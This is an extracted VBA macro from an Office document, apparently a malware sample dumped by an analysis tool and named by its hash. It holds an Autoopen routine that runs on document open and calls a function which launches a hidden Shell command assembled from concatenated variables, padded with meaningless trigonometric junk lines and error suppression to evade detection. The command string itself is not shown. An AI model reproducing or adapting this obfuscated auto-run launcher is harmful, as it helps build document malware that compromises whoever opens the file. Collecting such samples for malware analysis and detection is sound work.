Filename     : ./macros/dab8229bf5945aca41b632a6421b17bf993b145918de6419e37c305844251ec0
OLE stream   : Macros/VBA/XrQphZPwvdk
VBA filename : XrQphZPwvdk.cls
----------------------------------------
Attribute VB_Name = "XrQphZPwvdk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function MTUsjcVA()
On Error Resume Next
ljzLC = Tan(NmzZGV _
* Tan(cfroEi * Int(ZzdtE * Sqr(83911) / hAXnM + Fix(68393)) / 84274 * Round(5138 / Log(50985 - aJsOSn) + 83228 - jaNAs)) _
/ 7766 + Log(48814))
zwlFGH = Tan(Fjlal _
* Tan(lkZEAO * Int(mEHMmp * Sqr(44623) / JjITO + Fix(65502)) / 69086 * Round(87873 / Log(32777 - kSwni) + 62364 - FJvqn)) _
/ 91626 + Log(84220))
MTUsjcVA = iIChAQoq + Shell(tsdtj + Chr(WXbZj + vbKeyP + dNvYN) + XKvbi + fAWjCPjRn + YrumT + iQLfw, 36301 - 36301)
isvrZT = Tan(jtwzd _
* Tan(XLBqI * Int(PvwwWa * Sqr(98876) / fcaVlQ + Fix(56922)) / 69121 * Round(79382 / Log(78424 - rBTiF) + 82925 - CFhwtz)) _
/ 59177 + Log(22504))
End Function
Sub Autoopen()
On Error Resume Next
thtYQZ = Tan(kHSaON _
* Tan(nWNoRi * Int(MrHnXt * Sqr(98661) / jbqZoj + Fix(4688)) / 91324 * Round(30747 / Log(73176 - OjbmQ) + 37896 - btbjLN)) _
/ 55671 + Log(61209))
MTUsjcVA
qlksjn = Tan(YrjpY _
* Tan(lazCwU * Int(lErUi * Sqr(34253) / FCPcw + Fix(16597)) / 5344 * Round(23496 / Log(18409 - tmbjCv) + 63144 - QhIAiJ)) _
/ 28471 + Log(17075))
End Sub


